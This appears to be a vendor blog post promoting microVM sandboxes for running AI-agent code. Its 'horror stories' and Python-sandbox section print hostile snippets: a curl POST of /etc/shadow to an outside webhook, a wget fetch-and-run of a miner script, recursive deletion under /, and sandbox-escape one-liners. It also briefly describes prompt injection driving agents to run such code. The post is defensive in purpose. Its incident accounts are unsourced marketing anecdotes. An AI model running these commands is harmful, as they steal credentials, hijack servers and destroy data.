
Why AI Agents Need Isolated Code Execution

AI Agents · Alin Dobra · 7 min read

The AI industry has a dirty secret: most AI agents running in production today are executing LLM-generated code directly on host machines. No isolation. No sandboxing. Just raw exec() calls with whatever code GPT-4 decides to output.

This is a ticking time bomb.

The Rise of Code-Executing AI Agents

AI agents have evolved from simple chatbots to autonomous systems that can:

  • Write and execute Python scripts
  • Query databases
  • Make API calls
  • Manipulate files
  • Install packages

Tools like OpenAI's Code Interpreter, LangChain agents, and AutoGPT have normalized the idea of LLMs generating and running code. And it works remarkably well—until it doesn't.

The Problem: LLMs Are Unpredictable

Here's a fundamental truth: you cannot trust LLM-generated code.

Not because LLMs are malicious, but because:

  1. Prompt injection attacks can manipulate agents to execute harmful code
  2. Hallucinations can produce syntactically valid but dangerous commands
  3. Unintended behaviors emerge from ambiguous instructions
  4. User inputs flow through prompts into executable code
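
To see how easily this goes wrong, here is a minimal sketch of the unsafe pattern: user input flows through a prompt into code that runs directly on the host via exec(). The function name and prompt wording are illustrative only, not taken from any real agent framework.

python
from openai import OpenAI

client = OpenAI()

def naive_agent(user_request: str) -> None:
    # Ask the model for code; the prompt wording here is illustrative.
    response = client.chat.completions.create(
        model="gpt-4",
        messages=[{"role": "user", "content": f"Write Python code to: {user_request}"}],
    )
    code = response.choices[0].message.content
    # Danger: whatever the model produced runs directly on the host.
    exec(code)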

Real-World Horror Stories

Case 1: The Data Exfiltration Agent

A developer built a "helpful coding assistant" that could run user commands. A user asked it to "help debug a network issue." The LLM, trying to be helpful, executed:

python
import subprocess

subprocess.run(["cat", "/etc/passwd"])
subprocess.run(["curl", "-X", "POST", "https://webhook.site/xxx",
                "-d", "@/etc/shadow"])

The agent exfiltrated system credentials to an external server.

Case 2: The Destructive "Cleanup"

An AI data analysis agent was asked to "process all files in the directory." The LLM generated:

python
import os

for f in os.listdir("/"):
    os.remove(os.path.join("/", f))  # Misinterpreted "process" as "clean up"

The agent started deleting system files before anyone noticed.

Case 3: The Crypto Miner

Through prompt injection, an attacker made a customer service AI execute:

python
import subprocess

subprocess.run(["wget", "https://malware.site/miner.sh", "-O", "/tmp/m.sh"])
subprocess.run(["bash", "/tmp/m.sh"])

The company's servers became crypto miners for weeks before detection.

Why Traditional Sandboxing Falls Short

You might think: "I'll just use Docker containers" or "I'll restrict Python's capabilities."

Here's why that's not enough:

Docker Containers Are Not Security Boundaries

Docker was designed for packaging, not security isolation. Containers share the host kernel, and container escape vulnerabilities are discovered regularly:

  • CVE-2019-5736: Container escape via runc
  • CVE-2020-15257: Container escape via containerd
  • CVE-2022-0185: Container escape via kernel vulnerability

If an attacker escapes your container, they own your host machine—and every other container on it.

Python Sandboxing Is Fundamentally Broken

Attempts to sandbox Python by removing dangerous modules (like os, subprocess, socket) fail because:

python
# You blocked 'os'? No problem.
__builtins__.__import__('os').system('rm -rf /')

# You blocked that? Try this.
().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()

Python's introspection makes it nearly impossible to create a secure sandbox at the language level.

Lambda Functions Have Their Own Issues

AWS Lambda provides good isolation, but:

  • Cold starts of 1-5 seconds make real-time AI unusable
  • 15-minute execution limits kill long-running tasks
  • No persistent filesystem between invocations
  • Complex setup for custom environments
  • Expensive at scale (you pay for idle time in warm functions)

The Solution: Hardware-Level Isolation

The only way to safely run untrusted code is hardware-level isolation—running each execution in its own virtual machine with a dedicated kernel.

This is how HopX works:

text
                 Your Application
                        |
                     HopX API
                        |
    +-------------+-------------+-------------+
    |   MicroVM   |   MicroVM   |   MicroVM   |
    |  Sandbox 1  |  Sandbox 2  |  Sandbox 3  |
    |             |             |             |
    |  Kernel 1   |  Kernel 2   |  Kernel 3   |
    |  FS 1       |  FS 2       |  FS 3       |
    |  Network 1  |  Network 2  |  Network 3  |
    +-------------+-------------+-------------+
                        |
                    Hypervisor
                        |
                  Bare Metal Host

Each sandbox has:

  • Its own kernel - No kernel exploits affect other sandboxes
  • Its own filesystem - Complete isolation of data
  • Its own network stack - No lateral movement possible
  • Resource limits - CPU, memory, and I/O constraints

Even if an attacker achieves root access inside a sandbox, they cannot:

  • Access other sandboxes
  • Access the host machine
  • Persist beyond the sandbox lifetime
  • Exfiltrate data to unauthorized destinations

But Isn't VM Isolation Slow?

This is the traditional argument against VMs. And it was true—until microVMs.

MicroVMs like Firecracker (developed by AWS for Lambda) boot in under 125 milliseconds. HopX sandboxes are ready to execute code in approximately 100ms.

Compare this to:

Technology          | Cold Start | Isolation Level
--------------------|------------|------------------
Direct execution    | 0ms        | None
Python subprocess   | ~50ms      | None
Docker container    | 500ms-2s   | Process isolation
AWS Lambda          | 1-5s       | MicroVM
HopX Sandbox        | ~100ms     | MicroVM

You get hardware-level security with near-instant startup.

What This Means for Your AI Agents

If you're building AI agents that execute code, you have three options:

Option 1: Accept the Risk (Don't)

Run LLM-generated code directly on your servers. Cross your fingers. Hope your LLM never hallucinates a dangerous command.

This is what most people do. It works until it catastrophically doesn't.

Option 2: Limit Agent Capabilities (Frustrating)

Restrict what your agent can do. No file access. No network calls. No package installation.

This makes your agent significantly less useful. Users will go to competitors with more capable agents.

Option 3: Use Proper Isolation (Smart)

Execute all untrusted code in isolated sandboxes. Let your LLM do whatever it wants—inside a cage.

python
from hopx_ai import Sandbox
from openai import OpenAI

client = OpenAI()

def safe_code_agent(user_request: str) -> str:
    # Get code from LLM
    response = client.chat.completions.create(
        model="gpt-4",
        messages=[{"role": "user", "content": user_request}]
    )
    code = response.choices[0].message.content

    # Execute in isolated sandbox
    with Sandbox.create(template="code-interpreter") as sandbox:
        result = sandbox.run_code(code)
        return result.stdout

The LLM can generate any code. The sandbox ensures it can't harm your infrastructure.
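
As a quick illustration, calling the agent looks like this (the request string is just an example):

python
# Illustrative call to the function defined above.
output = safe_code_agent("Write Python that prints the first 10 Fibonacci numbers")
print(output)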

The Business Case for Isolation

Beyond security, there are business reasons to isolate AI agent execution:

Compliance

GDPR, HIPAA, SOC 2, and other frameworks require data isolation. Running user data through shared execution environments is a compliance nightmare.

Multi-tenancy

If you're building a B2B AI product, each customer's data must be isolated. Sandboxes provide this by default.

Predictable Costs

Runaway processes in shared environments affect all users. Sandboxes have resource limits—one user can't consume all your compute.

Debugging

When something goes wrong, isolated sandboxes make debugging straightforward. Each execution is contained and logged independently.
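
As a rough sketch, using only the run_code result fields shown elsewhere in this post, each execution can be captured as its own self-contained log record:

python
import logging

from hopx_ai import Sandbox

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("agent-executions")

def run_and_log(code: str) -> str:
    # Each execution gets its own sandbox, so its output and exit status
    # form a self-contained record for later debugging.
    with Sandbox.create(template="code-interpreter") as sandbox:
        result = sandbox.run_code(code)
        logger.info("exit_code=%s stdout=%r stderr=%r",
                    result.exit_code, result.stdout, result.stderr)
        return result.stdout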

Getting Started with Secure Execution

Adding isolation to your AI agent is surprisingly simple:

bash
pip install hopx-ai
python
from hopx_ai import Sandbox

# Your agent logic
def execute_agent_code(code: str) -> str:
    with Sandbox.create(template="code-interpreter") as sandbox:
        result = sandbox.run_code(code)
        return result.stdout if result.exit_code == 0 else result.stderr

That's it. Every execution now runs in an isolated microVM.
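
A quick sanity check of the function above (the snippet passed in is only an example):

python
# Illustrative call to the function defined above.
print(execute_agent_code("print(sum(range(10)))"))  # Prints 45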

Common Questions

What if I need packages the template doesn't have?

Install them at runtime:

python
sandbox.commands.run("pip install pandas matplotlib seaborn")
sandbox.run_code("import pandas as pd; print(pd.__version__)")

Or create a custom template with your dependencies pre-installed.

Can sandboxes access the internet?

Yes, sandboxes have outbound internet access by default. You can restrict this if needed.

What about performance-sensitive applications?

Sandboxes add approximately 100ms of overhead for creation. For long-running tasks, this is negligible. For rapid-fire executions, you can reuse sandboxes.
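
For example, a single sandbox can stay open and serve several executions, paying the creation cost once (a sketch using only the API calls shown in this post):

python
from hopx_ai import Sandbox

snippets = [
    "print(1 + 1)",
    "print('hello from the same sandbox')",
]

# Reuse one sandbox for several executions, paying the ~100ms creation cost once.
with Sandbox.create(template="code-interpreter") as sandbox:
    for snippet in snippets:
        result = sandbox.run_code(snippet)
        print(result.stdout)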

How do I share data between my app and the sandbox?

Use the file API to upload data before execution and download results after:

python
sandbox.files.write("/data/input.csv", your_data)
sandbox.run_code("import pandas as pd; df = pd.read_csv('/data/input.csv')...")
result = sandbox.files.read("/data/output.csv")

Conclusion

AI agents are only getting more powerful. They'll write code, execute commands, and manipulate data at scales we can barely imagine.

The question isn't whether you need isolated execution—it's whether you'll add it before or after a security incident.

Hardware-level isolation with microVMs gives you:

  • True security - Not just "probably safe"
  • Fast startup - 100ms cold starts
  • Full capabilities - No artificial restrictions
  • Compliance - Data isolation by design

The infrastructure to do this safely exists today. Use it.


Ready to secure your AI agents? Get started with HopX and get $200 in free credits.